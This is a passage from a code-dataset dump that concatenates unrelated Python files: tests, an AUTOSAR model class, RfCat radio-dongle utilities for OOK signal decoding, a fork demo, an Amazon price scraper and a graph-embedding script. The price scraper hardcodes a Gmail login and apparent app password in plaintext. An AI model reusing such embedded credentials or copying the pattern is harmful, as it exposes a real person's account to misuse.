wikitongues.wikitongues.data_store.airtable.airtable_item_data_store import AirtableItemDataStore # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_http_client import IAirtableHttpClient # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_item_id_provider import AirtableItemIdProvider # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_item_formatter import IAirtableItemFormatter # noqa: E501\nfrom wikitongues.wikitongues.data_store.airtable.airtable_item_extractor import IAirtableItemExtractor # noqa: E501\n\nfrom wikitongues.wikitongues.data_store.error_response import ErrorResponse\n\nfrom wikitongues.wikitongues.items import WikitonguesItem\n\nimport unittest\nimport json\n\nEXPECTED_URL = 'aaa.com'\nEXPECTED_ISO = 'aaa'\nEXPECTED_NULL_URL = 'newsite.com/notyetcrawled'\nEXPECTED_JSON = '{\"records\": [{\"a\": \"a\"}]}'\nEXPECTED_NULL_JSON = '{\"records\": []}'\n\nEXPECTED_ITEM = WikitonguesItem(\n title='Title',\n url='aaa.com',\n language_id='aaa',\n spider_name='test'\n)\n\nEXPECTED_FIELDS = {\n 'Title': 'Title',\n 'Url': 'aaa.com',\n 'Language': [\n 'rec12345'\n ]\n}\n\n\nclass MockAirtableHttpClient(IAirtableHttpClient):\n def list_records(self):\n return MockResponse()\n\n def get_record(self, id):\n if id == f'{EXPECTED_ISO}:{EXPECTED_URL}':\n return MockResponse(EXPECTED_JSON)\n\n return MockResponse()\n\n def create_record(self, fields):\n if fields == EXPECTED_FIELDS:\n return MockResponse()\n\n return MockResponse(status_code=500)\n\n\nclass MockAirtableItemExtractor(IAirtableItemExtractor):\n def extract_items_from_json(self, json_obj, *args):\n result = ErrorResponse()\n\n if len(json_obj['records']) == 0:\n result.data = []\n elif json.dumps(json_obj) == EXPECTED_JSON:\n result.data = [EXPECTED_ITEM]\n\n return result\n\n def extract_item_from_json(self, json_obj):\n pass\n\n\nclass MockAirtableItemFormatter(IAirtableItemFormatter):\n def get_fields_dict(self, item):\n if item == EXPECTED_ITEM:\n return EXPECTED_FIELDS\n\n return {}\n\n\nclass MockResponse:\n def __init__(self, text=EXPECTED_NULL_JSON, status_code=200):\n self.text = text\n self.status_code = status_code\n\n\nclass TestAirtableItemDataStore(unittest.TestCase):\n def setUp(self):\n http_client = MockAirtableHttpClient()\n item_extractor = MockAirtableItemExtractor()\n item_formatter = MockAirtableItemFormatter()\n id_provider = AirtableItemIdProvider()\n self.data_store = AirtableItemDataStore(\n http_client, item_extractor, item_formatter, id_provider)\n\n def test_get_item(self):\n result = self.data_store.get_item(EXPECTED_URL, EXPECTED_ISO)\n\n self.assertEqual(EXPECTED_ITEM, result.data)\n\n def test_get_item__null_id(self):\n result = self.data_store.get_item(EXPECTED_NULL_URL, EXPECTED_ISO)\n\n self.assertIsNone(result.data)\n self.assertFalse(result.has_error())\n\n def test_create_item(self):\n result = self.data_store.create_item(EXPECTED_ITEM)\n\n self.assertFalse(result.has_error())\n","sub_path":"test/test_airtable_item_data_store.py","file_name":"test_airtable_item_data_store.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"290478248","text":"import demistomock as demisto # noqa: F401\nfrom CommonServerPython import * # noqa: F401\n\nBLACK_HTML_STYLE = \"color:#555555;text-align:center;font-size:200%;\"\n\n\ndef main():\n try:\n alert = demisto.context().get('Core', {}).get('OriginalAlert')[0]\n event = alert.get('event')\n regionName = event.get('region')\n\n html = f\"

{str(regionName)}

\"\n\n return return_results({\n 'ContentsFormat': EntryFormat.HTML,\n 'Type': EntryType.NOTE,\n 'Contents': html,\n })\n except Exception as e:\n return_error(f\"An error occurred: {str(e)}\")\n\n\nif __name__ in [\"__main__\", \"builtin\", \"builtins\"]:\n return_results(main())\n","sub_path":"Packs/CloudIncidentResponse/Scripts/EntryWidgetRegionNameXCLOUD/EntryWidgetRegionNameXCLOUD.py","file_name":"EntryWidgetRegionNameXCLOUD.py","file_ext":"py","file_size_in_byte":726,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"85945680","text":"import gmhttp\nimport unittest\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nimport sys\nsys.path.append(BASE_DIR)\nfrom common.get_config import g\n\n\n\n\n\nimport os,sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nfunc = os.path.basename(__file__).split('_test.py')[0]\nfrom common.gmpackage import *\n@ddt\nclass Coupon_Use_Coupon_Price(unittest.TestCase):\n '''\n SKU券后价接口\n '''\n\n @classmethod\n def setUpClass(cls):\n cls.host = g.host\n cls.api_name = g.api_name(func)\n cls.url = cls.host + cls.api_name\n print('获取环境信息和接口信息')\n self.host = g.host\n self.api_name = g.api_name(os.path.basename(__file__).split('_test.py')[0])\n self.android_params = g.android_params\n @data(*(get_values(func, \"test_coupon_use_coupon_price\")))\n def test_coupon_use_coupon_price(self,value):\n self._testMethodDoc = \"--\"\n '''\n SKU券后价接口\n '''\n url = self.host + self.api_name+ \"?\" + self.android_params\n r = gmhttp.get(url,verify=False)\n self.assertEqual(r.status_code,200,'返回码不为200!')\n r = r.json()\n self.assertEqual(r.get(\"error\"),0)\n print('用例执行完毕!')\n\n\n def tearDown(self):\n pass\n\n\nif __name__ == \"__main__\":\n Coupon_Use_Coupon_Price.run()","sub_path":"testCase/coupon_use_coupon_price_test.py","file_name":"coupon_use_coupon_price_test.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"330863572","text":"from dataclasses import dataclass, field\nfrom typing import List, Optional, Type\nfrom .binding_time_enum_simple import BindingTimeEnumSimple\nfrom .interval_type_enum_simple import IntervalTypeEnumSimple\nfrom .ref import Ref\nfrom .sw_systemconst_subtypes_enum import SwSystemconstSubtypesEnum\n\n__NAMESPACE__ = \"http://autosar.org/schema/r4.0\"\n\n\n@dataclass\nclass Limit:\n \"\"\"This class represents the ability to express a numerical limit.\n\n Note that this is in fact a NumericalValuationPoint but has the\n additional attribute intervalType. Note that the xml.name is \"LIMIT\"\n for backward compatibility reasons.\n\n :ivar s: Checksum calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine if\n an ArObject has changed. The checksum has no semantic meaning\n for an AUTOSAR model and there is no requirement for AUTOSAR\n tools to manage the checksum.\n :ivar t: Timestamp calculated by the user's tool environment for an\n ArObject. May be used in an own tool environment to determine\n the last change of an ArObject. The timestamp has no semantic\n meaning for an AUTOSAR model and there is no requirement for\n AUTOSAR tools to manage the timestamp.\n :ivar binding_time: This is the binding time in which the attribute\n value needs to be bound. If this attribute is missing, the\n attribute is not a variation point. In particular this means\n that It needs to be a single value according to the type\n specified in the pure model. It is an error if it is still a\n formula.\n :ivar blueprint_value: This represents a description that documents\n how the value shall be defined when deriving objects from the\n blueprint.\n :ivar sd: This special data is provided to allow synchronization of\n Attribute value variation points with variant management\n systems. The usage is subject of agreement between the involved\n parties.\n :ivar short_label: This allows to identify the variation point. It\n is also intended to allow RTE support for CompileTime Variation\n points.\n :ivar interval_type: This specifies the type of the interval. If the\n attribute is missing the interval shall be considered as\n \"CLOSED\".\n :ivar content:\n \"\"\"\n class Meta:\n name = \"LIMIT\"\n\n s: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"S\",\n \"type\": \"Attribute\",\n }\n )\n t: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"T\",\n \"type\": \"Attribute\",\n \"pattern\": r\"([0-9]{4}-[0-9]{2}-[0-9]{2})(T[0-9]{2}:[0-9]{2}:[0-9]{2}(Z|([+\\-][0-9]{2}:[0-9]{2})))?\",\n }\n )\n binding_time: Optional[BindingTimeEnumSimple] = field(\n default=None,\n metadata={\n \"name\": \"BINDING-TIME\",\n \"type\": \"Attribute\",\n }\n )\n blueprint_value: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"BLUEPRINT-VALUE\",\n \"type\": \"Attribute\",\n }\n )\n sd: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SD\",\n \"type\": \"Attribute\",\n }\n )\n short_label: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"SHORT-LABEL\",\n \"type\": \"Attribute\",\n \"max_length\": 128,\n \"pattern\": r\"[a-zA-Z]([a-zA-Z0-9]|_[a-zA-Z0-9])*_?\",\n }\n )\n interval_type: Optional[IntervalTypeEnumSimple] = field(\n default=None,\n metadata={\n \"name\": \"INTERVAL-TYPE\",\n \"type\": \"Attribute\",\n }\n )\n content: List[object] = field(\n default_factory=list,\n metadata={\n \"type\": \"Wildcard\",\n \"namespace\": \"##any\",\n \"mixed\": True,\n \"choices\": (\n {\n \"name\": \"SYSC-STRING-REF\",\n \"type\": Type[\"Limit.SyscStringRef\"],\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n },\n {\n \"name\": \"SYSC-REF\",\n \"type\": Type[\"Limit.SyscRef\"],\n \"namespace\": \"http://autosar.org/schema/r4.0\",\n },\n ),\n }\n )\n\n @dataclass\n class SyscStringRef(Ref):\n dest: Optional[SwSystemconstSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n\n @dataclass\n class SyscRef(Ref):\n dest: Optional[SwSystemconstSubtypesEnum] = field(\n default=None,\n metadata={\n \"name\": \"DEST\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n","sub_path":"autosar/models/limit.py","file_name":"limit.py","file_ext":"py","file_size_in_byte":4949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"130075335","text":"# The MIT License (MIT)\n#\n# Copyright (c) 2016 Leon Jacobs\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\nimport sys\nfrom collections import Counter\n\nimport click\nimport numpy\nimport rflib\n\n\ndef valid_packet(packet, constraint):\n \"\"\"\n Check if a hex encoded packet received from\n rflib.Rfcat.RFrecv has the constraint value in it.\n\n Idea From:\n https://github.com/mossmann/stealthlock/blob/master/sl.py#L17\n\n :param packet:\n :param constraint:\n :return:\n \"\"\"\n\n if constraint not in packet:\n return False\n\n return True\n\n\ndef pwm_decode(p):\n \"\"\"\n PWM-ify a received packet.\n Source:\n From https://github.com/mossmann/stealthlock/blob/master/sl.py#L37\n\n :param p:\n :return:\n \"\"\"\n\n biginteger = 0\n\n for byte in p:\n biginteger <<= 8\n biginteger |= ord(byte)\n\n biginteger >>= 12\n out = 0\n\n for i in range(28, (len(p) * 8 - 12) / 3, 1):\n out <<= 1\n out |= ((biginteger & 1) ^ 1)\n biginteger >>= 3\n\n return out\n\n\ndef oneline_print(string):\n \"\"\"\n Print a string with a carriage return\n\n :param string:\n :return:\n \"\"\"\n\n sys.stdout.write('{}\\r'.format(string))\n sys.stdout.flush()\n\n\ndef chunks(data, l):\n \"\"\"\n Yield l-sized chunks from data.\n\n :param data:\n :param l:\n :return:\n \"\"\"\n\n for i in range(0, len(data), l):\n yield data[i:i + l]\n\n\ndef cleanup_wave_data(data):\n \"\"\"\n\n :param data:\n :return:\n \"\"\"\n\n # Determine the min, max and average values.\n minval, maxval, valcount = numpy.amin(data), numpy.amax(data), len(data)\n meanval = numpy.mean([minval, maxval])\n click.secho('Total Samples: {}, Min: {}, Max: {}, Mean: {}'.format(\n valcount, minval, maxval, meanval), fg='green')\n\n # Give some information about what is going to happen now.\n click.secho('Cleaning up {} data points...'.format(valcount), dim=True)\n\n # Some constant values that will determine hard values\n # for legit data\n sample_border = 40000 # Calculate averages every x samples\n significant_max = minval + 3000 # Must have at least one data point with more than this\n clean_data = []\n\n # Ensure the source data is OK to work with by checking that we have\n # data points with at least a certain max and not less than a certain min\n if maxval < significant_max:\n click.secho('Data source has values that are not more than {}. These '\n 'values may skew average calculations. Please try and re-record '\n 'your data source.'.format(significant_max), fg='red')\n return clean_data\n\n for samples in chunks(data, sample_border):\n\n # Determine new min, max and means for this sample range\n sample_minval, sample_maxval = numpy.amin(samples), numpy.amax(samples)\n sample_mean = numpy.mean([sample_minval, sample_maxval])\n\n # Debug\n # print(sample_minval, sample_maxval, sample_mean)\n\n # Ensure we have data in this sample range that is workable\n if significant_max > sample_maxval:\n # click.secho('Dont have data in minimum range.', fg='yellow')\n continue\n\n for value in samples:\n\n # print (value, sample_mean)\n if (value > 500) and (value > sample_mean):\n clean_data.append(1)\n continue\n\n clean_data.append(0)\n # Apply the clean_values function to the sample range\n # average_func = numpy.vectorize(clean_values)\n # clean_data.append(average_func(samples, numpy.mean([sample_minval, sample_maxval])))\n\n # return list(itertools.chain(*clean_data))\n return clean_data\n\n\ndef find_common_string(data):\n \"\"\"\n Derived from:\n http://stackoverflow.com/questions/25071766/find-most-common-sub-string-pattern-in-a-file?answertab=votes#tab-top\n\n :param data:\n :return:\n \"\"\"\n\n d = {}\n\n for n in range(1, len(data)):\n\n substr_counter = Counter(data[i: i + n] for i in range(len(data) - n))\n phrase, count = substr_counter.most_common(1)[0]\n if count == 1: # early out for trivial cases\n break\n\n # print 'Size: %3d: Occurrences: %3d Phrase: %r' % (n, count, phrase)\n d[n] = {'occurrences': count, 'phrase': phrase}\n\n return d\n\n\ndef configure_dongle(d, frequency, pktflen, baud, modulation=rflib.MOD_ASK_OOK,\n syncmode=0, lowball=False):\n \"\"\"\n Configure an instance of rflib.RFCat\n\n :param d:\n :param frequency:\n :param pktflen:\n :param baud:\n :param modulation:\n :param syncmode:\n :param lowball:\n :return:\n \"\"\"\n\n # Set the radio frequency\n if frequency is not None:\n d.setFreq(frequency)\n click.secho('[radio] Frequency: {}'.format(frequency), dim=True)\n\n # Set the rest of the values\n d.setMdmModulation(modulation)\n d.makePktFLEN(pktflen)\n d.setMdmDRate(baud)\n d.setMdmSyncMode(syncmode) # Disable preamble\n\n click.secho('[radio] MdmModulation: {}'.format(modulation), dim=True)\n click.secho('[radio] PktFLEN: {}'.format(pktflen), dim=True)\n click.secho('[radio] MdmDRate: {}'.format(baud), dim=True)\n click.secho('[radio] MdmSyncMode: {}'.format(syncmode), dim=True)\n\n # set the radio to lowest filtering mode\n if lowball:\n d.lowball()\n click.secho('[radio] Lowball: {}'.format(lowball), dim=True, bold=True)\n\n return\n","sub_path":"ooktools/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":6605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"406458904","text":"#! /usr/bin/env python3\n\nimport os, sys, time\n\npid = os.getpid()\n\nos.write(1, (\"\\nAbout to fork (pid:%d)\\n\" % pid).encode())\n\nrc = os.fork()\n\nif rc < 0:\n os.write(2, (\"fork failed, returning %d\\n\" % rc).encode())\n sys.exit(1)\nelif rc == 0: # child\n os.write(1, (\"Child: My pid==%d. Parent's pid=%d\\n\" % \n (os.getpid(), pid)).encode())\n time.sleep(1) # block for 1 second\n os.write(1, \"Child ....terminating now with exit code 0\\n\".encode())\n sys.exit(0)\nelse: # parent (forked ok)\n os.write(1, (\"Parent: My pid=%d. Child's pid=%d\\n\" % \n (pid, rc)).encode())\n childPidCode = os.wait() #Guessing wait returns PID of what you waited on\n os.write(1, (\"Parent: Child %d terminated with exit code %d\\n\" % \n childPidCode).encode())\n\n\t\n#\t\"\"\"\n#\tTrace: \n#\t\tpid = 1\n#\t\t#write\n#\t\t\n#\t\t{Parent}\n#\t\trc = fork() ## which = 2 because its the pid of the forked program\n#\t\t\n#\t\telse:\n#\t\t\t#write\n#\t\t\tcPC = wait() which = 2 because its the pid of the waited program\n#\t\t\n#\t\t#After wait go to child\n#\t\t\n#\t\t\n#\t\t{Child}\n#\t\trc = 0 ## succesful fork\n#\t\t\n#\t\telif: \n#\t\t\t#write\n#\t\t\t#sleep one second\n#\t\t\t#write:\n#\t\t\t#exit (Is this necessary?)\n\t\t\t#after exit go back to wait in parent\n#\t\t\n#\t\t{Parent}\n#\t\t#write\n#\n#\t\"\"\"","sub_path":"demos/p2-wait.py","file_name":"p2-wait.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"589210986","text":"import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time\n\n# set the base url\nURL = 'https://www.amazon.in/New-Apple-iPhone-12-128GB/dp/B08L5TNJHG/ref=sr_1_1_sspa?dchild=1&keywords=iphone+12&qid=1624987878&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUEyQ1NNMVJGNVRYNjUwJmVuY3J5cHRlZElkPUEwNjgxMDM1VUhYNkxURUdQQU5JJmVuY3J5cHRlZEFkSWQ9QTAzMjQ0MDAxRldNOFJGVVZYRkFTJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n\n# set the headers and user string\nheaders = {\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36\"}\n\n\ndef check_price():\n\n # fetch the HTML of the page\n page = requests.get(URL, headers=headers)\n soup = BeautifulSoup(page.content, 'html.parser')\n\n # get the price and product title\n title = soup.find(id=\"productTitle\").get_text()\n price = soup.find(id=\"priceblock_dealprice\").get_text().replace(\n ',', '').replace('₹', '').replace(' ', '').strip()\n\n # converting the obtained string to float\n converted_price = float(price[0:5])\n\n # ouput the price and the product title\n print(converted_price)\n print(title.strip())\n\n # check if the price dropped\n if(converted_price > 75000):\n send_mail()\n\n\ndef send_mail():\n # setting connection\n server = smtplib.SMTP('smtp.gmail.com', 587)\n server.ehlo()\n # encryption\n server.starttls()\n server.ehlo()\n server.login('siddharth007gandhi@gmail.com', 'ftgxhwqmefgidpqw')\n\n # the connection is set\n\n # make the content for the mail\n subject = 'The price has dropped!!'\n body = 'The link to the item is https://www.amazon.in/New-Apple-iPhone-12-128GB/dp/B08L5TNJHG/ref=sr_1_1_sspa?dchild=1&keywords=iphone+12&qid=1624987878&sr=8-1-spons&psc=1&spLa=ZW5jcnlwdGVkUXVhbGlmaWVyPUEyQ1NNMVJGNVRYNjUwJmVuY3J5cHRlZElkPUEwNjgxMDM1VUhYNkxURUdQQU5JJmVuY3J5cHRlZEFkSWQ9QTAzMjQ0MDAxRldNOFJGVVZYRkFTJndpZGdldE5hbWU9c3BfYXRmJmFjdGlvbj1jbGlja1JlZGlyZWN0JmRvTm90TG9nQ2xpY2s9dHJ1ZQ=='\n msg = f\"Subject: {subject}\\n\\n{body}\"\n\n # sending the mail\n server.sendmail(\n 'siddharth007gandhi@gmail.com',\n 'siddharth007gandhi@gmail.com',\n msg\n )\n\n print('sent the email !!')\n\n server.quit()\n\n\n# call the price checking function once per 24 hrs or 1 day\nwhile(True):\n check_price()\n time.sleep(60*60*24)\n","sub_path":"scrapper.py","file_name":"scrapper.py","file_ext":"py","file_size_in_byte":2390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"325945817","text":"#linVregClass.py\nfrom .icClass import IC, ICTable\nfrom heodb import orderOfMagnitude\nfrom heodb.consts import bomConsts\n\nclass LinVRegTable(ICTable):\n\ttable = 'compLinVReg'\n\n\tdef __init__(self, db):\n\t\tICTable.__init__(self,db)\n\t\tself.linvreg_type = self.elementTable.addElement(title = 'Pos or Neg', \n\t\t\t\tname = 'linvreg_type', raiseWarnings = False, options = ('POS', 'NEG'))\n\t\tself.linvreg_ldo = self.elementTable.addElement(title = 'LDO', \n\t\t\t\tname = 'linvreg_ldo', elementType = 'BOOLEAN', raiseWarnings = False)\n\t\tself.linvreg_adj_volt = self.elementTable.addElement(title = 'Adjustable Voltage', \n\t\t\t\tname = 'linvreg_adj_volt', elementType = 'BOOLEAN', raiseWarnings = False)\n\t\tself.linvreg_vdropout = self.elementTable.addElement(title = 'Drop-Out Voltage', \n\t\t\t\tname = 'linvreg_vdropout', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_accuracy = self.elementTable.addElement(title = 'Accuracy', \n\t\t\t\tname = 'linvreg_accuracy', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vin_min = self.elementTable.addElement(title = 'V_In Min', \n\t\t\t\tname = 'linvreg_vin_min', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vin_max = self.elementTable.addElement(title = 'V_In Max', \n\t\t\t\tname = 'linvreg_vin_max', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vout_min = self.elementTable.addElement(title = 'V_Out Min', \n\t\t\t\tname = 'linvreg_vout_min', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_vout_max = self.elementTable.addElement(title = 'V_Out Max', \n\t\t\t\tname = 'linvreg_vout_max', elementType = 'FLOAT', raiseWarnings = False)\n\t\tself.linvreg_i_max = self.elementTable.addElement(title = 'I Max', \n\t\t\t\tname = 'linvreg_i_max', elementType = 'FLOAT', raiseWarnings = False)\n\n\tdef writeBomLine(self, bomLine):\n\t\tbomLine[bomConsts.bom_compSpec1] = self.linvreg_type.value\n\t\tbomLine[bomConsts.bom_compSpec2] = 'LDO' if self.linvreg_ldo.value == '1' else ''\n\t\tbomLine[bomConsts.bom_compSpec3] = 'ADJ' if self.linvreg_adj_volt.value == '1' else ''\n\t\tbomLine[bomConsts.bom_compSpec4] = \" Vin {}/{}\".format(orderOfMagnitude(self.linvreg_vin_min.value)[0], \n\t\t\t\torderOfMagnitude(self.linvreg_vin_max.value)[0])\n\t\tbomLine[bomConsts.bom_compSpec5] = \" Vout {}/{}\".format(orderOfMagnitude(self.linvreg_vout_min.value)[0], \n\t\t\t\torderOfMagnitude(self.linvreg_vout_max.value)[0])\n\t\tbomLine[bomConsts.bom_compSpec6] = \"{}A\".format(orderOfMagnitude(self.linvreg_i_max.value)[0])\n\n\t\treturn bomLine\n\n\tdef readBomLine(self, bomLine):\n\t\tself.linvreg_type.value = bomLine[bomConsts.bom_compSpec1].strip()\n\t\tif 'LDO' in bomLine[bomConsts.bom_compSpec2]:\n\t\t\tself.linvreg_ldo.value = 1 \n\t\telse:\n\t\t\tself.linvreg_ldo.value = 0\n\n\t\tif 'ADJ' in bomLine[bomConsts.bom_compSpec3]:\n\t\t\tself.linvreg_adj_volt.value = 1\n\t\telse:\n\t\t\tself.linvreg_adj_volt.value = 0\n\n\t\targ = bomLine[bomConsts.bom_compSpec4].strip().split(' ')[-1].split('/')\n\t\tself.linvreg_vin_min.value = arg[0]\n\t\tself.linvreg_vin_max.value = arg[1]\n\n\t\targ = bomLine[bomConsts.bom_compSpec5].strip().split(' ')[-1].split('/')\n\t\tself.linvreg_vout_min.value = arg[0]\n\t\tself.linvreg_vout_max.value = arg[1]\n\t\tself.linvreg_i_max.value = bomLine[bomConsts.bom_compSpec6]\n\n\t\tself.formatInput(self.getVals)\n\nclass LinVReg(IC):\n\tpart_type = 'V0'\n\tcomp_type = 'LINVREG'\n\tdef __init__(self, db):\n\t\tIC.__init__(self, db)\n\t\tself.db = db\n\t\tself.addComponentTable(LinVRegTable(db))\n\t\tself.posX = '10'\n\t\tself.posY = '20'\n\n\t@property\n\tdef comp_sub_type(self):\n\t\treturn None\n\nCompData = {'names': ('LVREG','LINVREG','LREG'), 'ComponentClass': LinVReg, 'isIC': True }\n","sub_path":"heodb/components/linVregClass.py","file_name":"linVregClass.py","file_ext":"py","file_size_in_byte":3556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"5121458","text":"from django.conf.urls import *\nfrom django.views.decorators.cache import cache_page\nfrom cera_data.ceracgi import cera_wms_tiled, cera_ani_tiled, cera_cgi, timesteps_forwarding, cera_wfs_forwarding\n\n# urls used for former cgi services\nurlpatterns = [ #patterns('cera_data.ceracgi',\n# (r'cera_wms_tiled', cache_page(3600 * 24)(cera_wms_tiled.do_work)),\n url(r'cera_wms_tiled', cera_wms_tiled.do_work),\n# (r'cera_ani_tiled', cache_page(3600 * 24)(cera_ani_tiled.do_work)),\n url(r'cera_ani_tiled', cera_ani_tiled.do_work),\n url(r'cera_cgi', cera_cgi.do_generate_cera_html_dev),\n url(r'cera_nc_cgi', cera_cgi.do_generate_cera_html_nc),\n url(r'cera_ng_cgi', cera_cgi.do_generate_cera_html_ng),\n url(r'cera_ri_cgi', cera_cgi.do_generate_cera_html_ri),\n url(r'cera_timesteps_cgi', timesteps_forwarding.do_work),\n# (r'cera_wfs_cgi', 'cera_wfs_cgi.do_work'),\n url(r'cera_wfs', cera_wfs_forwarding.do_work)\n# (r'(?P.*?)', 'cera_wms_tiled.do_work')\n]\n\n\n","sub_path":"django/cerarisk/cera_data/ceracgi/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"524448465","text":"from pathlib import Path\n\nimport json\n\nfrom django.contrib.gis.geos import Polygon, MultiPolygon\n\nDATA_FILENAME = 'residential_area_data1.json'\n\n\ndef load_data():\n # ResidentialArea = apps.get_model('schools', 'ResidentialArea')\n jsonfile = \"./\" + DATA_FILENAME\n\n with open(str(jsonfile)) as datafile:\n objects = json.load(datafile)\n for obj in objects['features']:\n try:\n objType = obj['geometry']['type']\n properties = obj['properties']\n objGeometry = obj['geometry']\n name = properties.get('mvt_id', 'no-name')\n coordinates = objGeometry.get('coordinates', [])\n if objType == 'Polygon':\n\n location = MultiPolygon(Polygon(coordinates[0]), srid=4326)\n ResidentialArea(name=name, location=location).save()\n elif objType == 'MultiPolygon':\n location = MultiPolygon(Polygon(coordinates[0][0]), srid=4326)\n ResidentialArea(name=name, location=location).save()\n except KeyError:\n pass\n\n\nload_data()\n","sub_path":"load_test.py","file_name":"load_test.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"472413639","text":"################################################################################\n# embedding_pipeline.py\n# Authors: Matt Rosen + Oliver Zhu\n# \n# Pipeline for isomorphism-aware embedding of weight matrices.\n################################################################################\n\n################################################################################\n# Imports\n########################################\nimport networkx as nx\nimport numpy as np \nimport subprocess\nimport pickle \nimport json\nimport glob\nimport sys\nimport os\n\n################################################################################\n# Utility functions\n########################################\ndef load_single_network_file(filename, simple_version = True):\n\n # Load data\n dat_dict = pickle.load(open(filename, 'rb'))\n\n # extract weight matrix, return\n if simple_version:\n return dat_dict['weights']['w_rnn']\n else:\n return dat_dict\n\n################################################################################\n# Main method\n########################################\nif __name__ == \"__main__\":\n\n # Import graphs\n N = 10 # number of networks total to load\n N_PER = 10 # number of networks of each type to load\n N_NEUR = 60 # number of neurons per network\n N_DIM = sys.argv[1] # number of dimensions for embedding\n\n # Load in dataset names\n task_list = ['DMS', 'DMRS180']\n fns = {}\n for task in task_list:\n #fns[task] = glob.glob(f\"./savedir/*/{task}*.pkl\")\n fns[task] = glob.glob(f\"/Volumes/My Passport/Lots of RNNs 1/*/{task}*.pkl\")\n\n # Ensure output folder exists\n if not os.path.exists(\"./dataset/\"):\n os.makedirs(\"./dataset/\")\n\n # Load our weight matrices + write to JSON\n nets = {}\n counter = 0\n metadata = []\n for task in task_list:\n choice_inds = np.random.choice(len(fns[task]), N // N_PER)\n for t, i in enumerate(choice_inds):\n all_params = load_single_network_file(fns[task][i], False)\n w_rnn = all_params['weights']['w_rnn']\n\n # Sparsify each network separately\n sparsity_fraction = 0.7\n sorted_inds = np.array([np.argsort(abs(w_rnn[net_id,:,:]), None) for net_id in range(w_rnn.shape[0])])\n\n to_remove = int(sparsity_fraction * N_NEUR * N_NEUR)\n for net_id in range(w_rnn.shape[0]):\n rows = sorted_inds[net_id, 0:to_remove] // N_NEUR\n cols = sorted_inds[net_id, 0:to_remove] % N_NEUR\n w_rnn[net_id, rows, cols] = 0\n\n # Convert each to JSON as expected for graph2vec; \n # 2 fields (edges, features)\n G = nx.DiGraph(np.squeeze(w_rnn[net_id, :, :]))\n edges = G.edges()\n edge_list = [[int(a[0]), int(a[1])] for a in edges]\n to_write = json.dumps({\"edges\": edge_list})\n with open(f\"dataset/{counter}.json\", 'w') as f:\n f.write(to_write)\n\n # Save metadata (e.g. network name/type)\n metadata.append(f\"{str(counter)} {fns[task][i][36:]}\")\n counter += 1\n\n with open(\"metadata.txt\", 'w') as f:\n f.write(\"\\n\".join(metadata))\n\n # Invoke the command to run graph2vec through subprocess.call\n subprocess.call([\"python3\", \"../graph2vec/src/graph2vec.py\", \n 